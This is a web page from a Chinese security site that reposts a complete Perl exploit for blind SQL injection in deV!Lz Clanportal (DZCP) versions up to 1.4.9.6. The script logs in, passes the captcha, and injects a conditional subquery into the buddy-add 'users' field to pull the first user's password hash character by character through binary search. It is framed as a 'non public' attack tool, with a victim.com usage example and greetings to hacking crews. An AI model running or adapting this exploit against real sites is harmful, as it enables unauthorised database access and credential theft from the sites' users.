首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:h0yt3r 发布时间:2008-11-03  
use HTTP::Cookies;
use LWP::UserAgent;

my $ua    = LWP::UserAgent->new( cookie_jar => HTTP::Cookies->new,);

$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

usage();
print "\n";

$server =   $ARGV[0];
$dir = $ARGV[1];
$username =   $ARGV[2];
$password = $ARGV[3];

if (!$password) { die "Argh! Read teh Usage!\n"; }

$url0 = "http://".$server.$dir."user/index.php";
$url1 = $url0."?action=login&do=yes";
$url2 = $url0."?action=buddys&do=addbuddy";

syswrite(STDOUT, "[x]Connecting...", 16);

$response = $ua->get($url0);
if($response->is_success) {syswrite(STDOUT, "OK", 2);} else { print "\n[x]Ey I couldn't connect to ".$url0; exit;}
print "\n";

$captcha = ($response->content =~ m/secure=login/i) ? 1 : 0;

if($captcha) { captcha(); }

$response = (!$captcha) ? $ua->post($url1, [ "user" => $username, "pwd" => $password ]) : $ua->post($url1, [ "user" => $username, "pwd" => $password , "secure" => $imgCode]);

if($response->content =~ m/Sicherheitsscode/i) { print "[x]Lol you gave me wrong image code. Restart!"; exit; }
elsif($response->content =~ m/gesperrt/i) { print "[x]Omg you gave me wrong user details. Restart!"; exit; }

$response = $ua->get($url2);

print "[x]Kay, unleashing BlackMagic now. Getta Coffee and wait!!\n";

my @Daten;
array();

my $operator;

syswrite(STDOUT, "[x]Password: ", 13);

for($b=1;$b<=32;$b++) { inject(0,16); }

print "\n[x]OmFg I made it!!\n";
print "[x]Have FUN!\n";
print "[x]Greetz & Shoutz go to: IP-Sh0k, haZl0oh, bizzit, NoNePub, thund3r ,ramon,\n";
print "   J0hn.X3r, electron1x, Paloxus, -tmh- aka B-Baerchi, Nazrek aka Patrick_B, WooMic, codeblu815\n";
print "   Free-Hack, Sys-Flaw, SoH and h4ck-y0u!\n";
print "[x]Biggest Thanks go to Shadowleet aka \$h4d0wl33t who is simply the best at his stuff!";

sub hex_to_ascii($)
{      
        (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
        return $str;
}
sub inject
{
    $beg = $_[0]; $end = $_[1];  
    $mid = int(($beg + $end)/2); #print $mid."\n";
    if(&equals($mid))
    {      
        syswrite(STDOUT, hex_to_ascii($Daten[$mid]), 1);                
        return;  
    }
    elsif(&bigger($mid)) { return inject($mid + 1, $end); }  
    else { return inject($beg, $mid - 1); }      
}

sub equals { $ack = $_[0]; if( &request("=", $ack) !~ m/1242/i) { return 1; } }

sub bigger { $ack = $_[0]; if(&request(">", $ack) !~ m/1242/i) { return 1; } }

sub request
{  
    $operator = $_[0]; $bick = $_[1];                             #probably only users without dzcp_
    $response = $ua->post($url2, [ "users" => "999 and if(substring((select pwd from dzcp_users limit 0,1),".$b.",1)".$operator."0x".$Daten[$bick].",null,(select 1 union select 2))" ]);
    #print $response->content;
    return $response->content;
}

sub usage()
{
    print q
    {
    ------------------NON PUBLIC EXPLOIT-----------------
    #####################################################
            deV!L`z Clanportal BlackMagic EXPLOIT        
                  -Exploit coded by h0yt3r-            
     Usage: devilz.pl [Server] [Path] [Username] [Password]
     Sample:                          
     perl devilz.pl www.victim.com /devilz/ h0yt3r 1337

     Exploit requires Username and Password, as the vul-
     nerable file is only visible for registered users!
    #####################################################
    };

}

sub captcha
{
    print "[x]Captcha required!\n";
    $captchaURL = "http://".$server.$dir."/antispam.php?secure=login";
    my $captchaReq= $ua->get($captchaURL);
    open(IMG,">captcha.jpg");
    binmode IMG;
    print IMG $captchaReq->content;
    close IMG;
    system('start captcha.jpg');
    print "[x]Image Code: ";
    $imgCode = <STDIN>;
    chop($imgCode);  
}

sub array
{
    for($b=30;$b<=39; $b++) { push(@Daten,$b); }
    for($b=61;$b<=66; $b++) { push(@Daten,$b); }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chipmunk CMS (reguser.php) Add
·Micro CMS <= 0.3.5 Remote (Add
·FTP Now 2.6 Server Response Re
·U-Mail Webmail 4.91 (edit.php)
·Chipmunk CMS (reguser.php) Add
·deV!Lz Clanportal [DZCP] <= 1
·TR News <= 2.1 (login.php) Rem
·Simple Machines Forum (SMF) 1.
·>Opera 9.62 (opera:allinone) R
·PHPX 3.5.16 (news_id) Remote S
·DebugDiag suffers from a NULL
·Adobe Reader util.printf() Jav
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved